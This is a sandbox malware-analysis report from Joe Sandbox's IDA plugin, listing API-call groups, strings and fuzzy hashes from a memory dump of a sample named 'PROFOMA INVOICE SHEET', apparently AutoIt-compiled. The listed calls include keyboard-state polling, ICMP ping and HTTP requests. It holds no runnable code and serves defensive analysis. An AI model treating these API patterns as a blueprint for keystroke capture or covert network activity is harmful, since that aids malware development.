                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 438f0f3adb1028f4315ba4b7c308bdc5aa2f0f74c3c2c2b4cc9b23bb049a5f74
                                    • Instruction ID: ec668a2a42be4d0d74579ca3554b918365b1327aee47d3eef0eb120d555c9b2c
                                    • Opcode Fuzzy Hash: 438f0f3adb1028f4315ba4b7c308bdc5aa2f0f74c3c2c2b4cc9b23bb049a5f74
                                    • Instruction Fuzzy Hash: 68416035A00219DFCF06DF69C854DEEBBB9FF08345F008069E905AB261CB31A945CFA1
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00369CA1
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00369D22
                                    • GetKeyState.USER32(000000A0), ref: 00369D3D
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00369D57
                                    • GetKeyState.USER32(000000A1), ref: 00369D6C
                                    • GetAsyncKeyState.USER32(00000011), ref: 00369D84
                                    • GetKeyState.USER32(00000011), ref: 00369D96
                                    • GetAsyncKeyState.USER32(00000012), ref: 00369DAE
                                    • GetKeyState.USER32(00000012), ref: 00369DC0
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00369DD8
                                    • GetKeyState.USER32(0000005B), ref: 00369DEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 1a62de9ebc1c6cb9e26b8c7b3a279337356776c2ce737568249da3dd2be0d532
                                    • Instruction ID: 8154f5476d798145f5272892fa4f3aaee5d004cad18a962773a10575a9f687fe
                                    • Opcode Fuzzy Hash: 1a62de9ebc1c6cb9e26b8c7b3a279337356776c2ce737568249da3dd2be0d532
                                    • Instruction Fuzzy Hash: 2441F8345047C96DFF338765C8043B5BEA86F12344F0AC06BDAC6565C6DBB599C8C7A2
                                    APIs
                                    • WSAStartup.WSOCK32(00000101,?), ref: 003805BC
                                    • inet_addr.WSOCK32(?), ref: 0038061C
                                    • gethostbyname.WSOCK32(?), ref: 00380628
                                    • IcmpCreateFile.IPHLPAPI ref: 00380636
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003806C6
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003806E5
                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 003807B9
                                    • WSACleanup.WSOCK32 ref: 003807BF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: b72cea5712d94db93b70c76360546500c2e084bbb56b092be7f13e2fbddd74b0
                                    • Instruction ID: 0d4e72eba8d8de316a4a1c01fc42d48568e068d15de963d5c7a18bf4f0bfd0f3
                                    • Opcode Fuzzy Hash: b72cea5712d94db93b70c76360546500c2e084bbb56b092be7f13e2fbddd74b0
                                    • Instruction Fuzzy Hash: A691AC356083019FD766EF15C888F1ABBE4AF48318F1585A9F4698B6A2C730ED49CF91
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharLower
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 707087890-567219261
                                    • Opcode ID: 76ffb8eaef19f64e3f8d3d3810b1db72677581b0960a13adfcbc33cd88b1951b
                                    • Instruction ID: 4aec8becd61c4ec834f8d1d747ba83a4f29350c53c228759631a27948b748f2d
                                    • Opcode Fuzzy Hash: 76ffb8eaef19f64e3f8d3d3810b1db72677581b0960a13adfcbc33cd88b1951b
                                    • Instruction Fuzzy Hash: 1F51B631A002169BCF16EF6CC9509BEB7A5BF64314BA14269E426EB2C5DB31ED44C790
                                    APIs
                                    • CoInitialize.OLE32 ref: 00383774
                                    • CoUninitialize.OLE32 ref: 0038377F
                                    • CoCreateInstance.OLE32(?,00000000,00000017,0039FB78,?), ref: 003837D9
                                    • IIDFromString.OLE32(?,?), ref: 0038384C
                                    • VariantInit.OLEAUT32(?), ref: 003838E4
                                    • VariantClear.OLEAUT32(?), ref: 00383936
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 636576611-1287834457
                                    • Opcode ID: cdccda039d9c5b311b5e92cdb2a456ae74fb78f8be958195d2984cc89267f8b9
                                    • Instruction ID: a29181cad000f21ef4d0d84d2266a24b9e018e749018b54c667a0645d5650ce2
                                    • Opcode Fuzzy Hash: cdccda039d9c5b311b5e92cdb2a456ae74fb78f8be958195d2984cc89267f8b9
                                    • Instruction Fuzzy Hash: 4F619F71608311AFD712EF54C849FAAB7E8EF49B10F104889F9959B391D770EE48CB92
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 003733CF
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003733F0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LoadString$_wcslen
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 4099089115-3080491070
                                    • Opcode ID: 8f554c0b71a783acfd8171509e2055fe44e115a400738c2dce0a03039c3bfab8
                                    • Instruction ID: 037947fdcf13df00746f3f235310a17bd76803418e1ba879c3e023ce49987670
                                    • Opcode Fuzzy Hash: 8f554c0b71a783acfd8171509e2055fe44e115a400738c2dce0a03039c3bfab8
                                    • Instruction Fuzzy Hash: 69517C71901209ABDF1BEBA0DD52EEEB778AF04340F108166F505B60A2EB356F58DB60
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 1256254125-769500911
                                    • Opcode ID: dd8866c8586bbb60d1ede63badebf499e62b061744d3293e7e9d2ce781525036
                                    • Instruction ID: e70b13a220f5add30bb5bdba6fe3f4580d2594266a7ee3ed8689e8a81abc7929
                                    • Opcode Fuzzy Hash: dd8866c8586bbb60d1ede63badebf499e62b061744d3293e7e9d2ce781525036
                                    • Instruction Fuzzy Hash: 3241D832A011269BCB125F7DC9915BEF7A5AF60754B268129E461DB288E731CDC1CBA0
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 003753A0
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00375416
                                    • GetLastError.KERNEL32 ref: 00375420
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 003754A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 3e644080cf6825220b92c61d1857fec23c3a83c2d9f9010bab339696db9f01ad
                                    • Instruction ID: 0b7d42cc2e3fa977ed273a8adc4b9bc4686d1002ed101b8d774309ceaff04639
                                    • Opcode Fuzzy Hash: 3e644080cf6825220b92c61d1857fec23c3a83c2d9f9010bab339696db9f01ad
                                    • Instruction Fuzzy Hash: F531D635A005049FDB26DF69C485FAA7BB8EF05305F15C05AE40ACF292DBB5DD82CB90
                                    APIs
                                    • CreateMenu.USER32 ref: 00393C79
                                    • SetMenu.USER32(?,00000000), ref: 00393C88
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00393D10
                                    • IsMenu.USER32(?), ref: 00393D24
                                    • CreatePopupMenu.USER32 ref: 00393D2E
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00393D5B
                                    • DrawMenuBar.USER32 ref: 00393D63
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                    • String ID: 0$F
                                    • API String ID: 161812096-3044882817
                                    • Opcode ID: 35c5217bf69ea8ba6ff6fb7f1ec5e08e03a8394bd19c182dfe856b9a365410cd
                                    • Instruction ID: 44f0fd3f8b167d117ad8a7fff05fa9a6a22b174b129c74f03ee5af31718911fc
                                    • Opcode Fuzzy Hash: 35c5217bf69ea8ba6ff6fb7f1ec5e08e03a8394bd19c182dfe856b9a365410cd
                                    • Instruction Fuzzy Hash: F4417CB9A01209EFDF15CFA4E854AAA7BB9FF49350F150029F94697360D731AA10CF94
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00393A9D
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00393AA0
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00393AC7
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00393AEA
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00393B62
                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00393BAC
                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00393BC7
                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00393BE2
                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00393BF6
                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00393C13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow
                                    • String ID:
                                    • API String ID: 312131281-0
                                    • Opcode ID: 9245a3dced86cb4afe146e400e809158a37b9bb1eb333d427fe8b269692d63f6
                                    • Instruction ID: 771250ab7feb24e1faee25dc82a61e33e602b7dd2cfcc3bd244640be0d88b027
                                    • Opcode Fuzzy Hash: 9245a3dced86cb4afe146e400e809158a37b9bb1eb333d427fe8b269692d63f6
                                    • Instruction Fuzzy Hash: 32615DB5900248AFDB12DFA8CC81EEE77F8EB09710F10415AFA15AB291D774AE45DF50
                                    APIs
                                    • _free.LIBCMT ref: 00332C94
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 00332CA0
                                    • _free.LIBCMT ref: 00332CAB
                                    • _free.LIBCMT ref: 00332CB6
                                    • _free.LIBCMT ref: 00332CC1
                                    • _free.LIBCMT ref: 00332CCC
                                    • _free.LIBCMT ref: 00332CD7
                                    • _free.LIBCMT ref: 00332CE2
                                    • _free.LIBCMT ref: 00332CED
                                    • _free.LIBCMT ref: 00332CFB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 6b3128988df61f6254982760439f8542acfd5a32fa21f7d15356567385434b2c
                                    • Instruction ID: df96533031c4c1f8cbeb4518ea8636119906fbe73bf74f543e6d7ca1efd51e9e
                                    • Opcode Fuzzy Hash: 6b3128988df61f6254982760439f8542acfd5a32fa21f7d15356567385434b2c
                                    • Instruction Fuzzy Hash: C911A476100118AFCB03EF54E882DDE7BA5FF06350F4144A5FA489F222DB31EE609B90
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00301459
                                    • OleUninitialize.OLE32(?,00000000), ref: 003014F8
                                    • UnregisterHotKey.USER32(?), ref: 003016DD
                                    • DestroyWindow.USER32(?), ref: 003424B9
                                    • FreeLibrary.KERNEL32(?), ref: 0034251E
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0034254B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: b490e9e2d2b7671baf9783131e6f60203793c1770847597a3108de1ea4ee52c2
                                    • Instruction ID: 6438b4563b4b6a02c19bfefe75abe6178c07abf9c42196d2abc614210548d2bb
                                    • Opcode Fuzzy Hash: b490e9e2d2b7671baf9783131e6f60203793c1770847597a3108de1ea4ee52c2
                                    • Instruction Fuzzy Hash: 1BD15D31702212CFCB2BEF15C8A5A6AF7A4BF05700F55419DE84A6F2A2DB31AD52CF51
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00305C7A
                                      • Part of subcall function 00305D0A: GetClientRect.USER32(?,?), ref: 00305D30
                                      • Part of subcall function 00305D0A: GetWindowRect.USER32(?,?), ref: 00305D71
                                      • Part of subcall function 00305D0A: ScreenToClient.USER32(?,?), ref: 00305D99
                                    • GetDC.USER32 ref: 003446F5
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00344708
                                    • SelectObject.GDI32(00000000,00000000), ref: 00344716
                                    • SelectObject.GDI32(00000000,00000000), ref: 0034472B
                                    • ReleaseDC.USER32(?,00000000), ref: 00344733
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003447C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: 94358f2ef7a41bc8bc1eaa70e47b14f51156ac89d728a2c73a23f3920c95ee43
                                    • Instruction ID: 693ec78102444a986bd51cacc6605ecf9682b3a7785d5d1e491d5104bc21ffe5
                                    • Opcode Fuzzy Hash: 94358f2ef7a41bc8bc1eaa70e47b14f51156ac89d728a2c73a23f3920c95ee43
                                    • Instruction Fuzzy Hash: F271BD31401205DFDF23CF64C984AAA7BF9FF4A360F15427AE9655E1A6C731A882DF60
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003735E4
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • LoadStringW.USER32(003D2390,?,00000FFF,?), ref: 0037360A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LoadString$_wcslen
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 4099089115-2391861430
                                    • Opcode ID: 986acc37108dc914607785965f6b61073990370a25f28ba2f65d57beb2f3b624
                                    • Instruction ID: 322cb6b8e18fd3f8c78397a6f68ded711686e027a6c3e10f58771afd53c88db2
                                    • Opcode Fuzzy Hash: 986acc37108dc914607785965f6b61073990370a25f28ba2f65d57beb2f3b624
                                    • Instruction Fuzzy Hash: AC516071901249BBDF17EBA0DC92EEEBB78AF04300F148166F105761A2DB315A99DFA1
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0037C272
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0037C29A
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0037C2CA
                                    • GetLastError.KERNEL32 ref: 0037C322
                                    • SetEvent.KERNEL32(?), ref: 0037C336
                                    • InternetCloseHandle.WININET(00000000), ref: 0037C341
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    • Opcode ID: 75012f665f5671c1adc70ed3a21b0ae74cc8654225a09b0d4067c4870bd2a68c
                                    • Instruction ID: a6022cdd7b3b94792446e65df77a7080646251d20874aaa6e57cc1a224ac5294
                                    • Opcode Fuzzy Hash: 75012f665f5671c1adc70ed3a21b0ae74cc8654225a09b0d4067c4870bd2a68c
                                    • Instruction Fuzzy Hash: D1319175510608AFEB339FA48C84AAB7BFCEB49740F14D51EF44A96201DB39DD049B60
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00343AAF,?,?,Bad directive syntax error,0039CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 003698BC
                                    • LoadStringW.USER32(00000000,?,00343AAF,?), ref: 003698C3
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00369987
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString_wcslen
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 858772685-4153970271
                                    • Opcode ID: 42caf50f21e30b83cd84b7e03f7e02032b387b53abf708425475eff7d03cfdf6
                                    • Instruction ID: d5018e8c4ff123aa0fb646858f51165199d8bb08872e7c65b946f56d4b7ae2e0
                                    • Opcode Fuzzy Hash: 42caf50f21e30b83cd84b7e03f7e02032b387b53abf708425475eff7d03cfdf6
                                    • Instruction Fuzzy Hash: 88215C3191021AABCF17EF90CC56FEE7779BF18300F04846AF5156A0A2EB71AA58DB51
                                    APIs
                                    • GetParent.USER32 ref: 003620AB
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 003620C0
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0036214D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
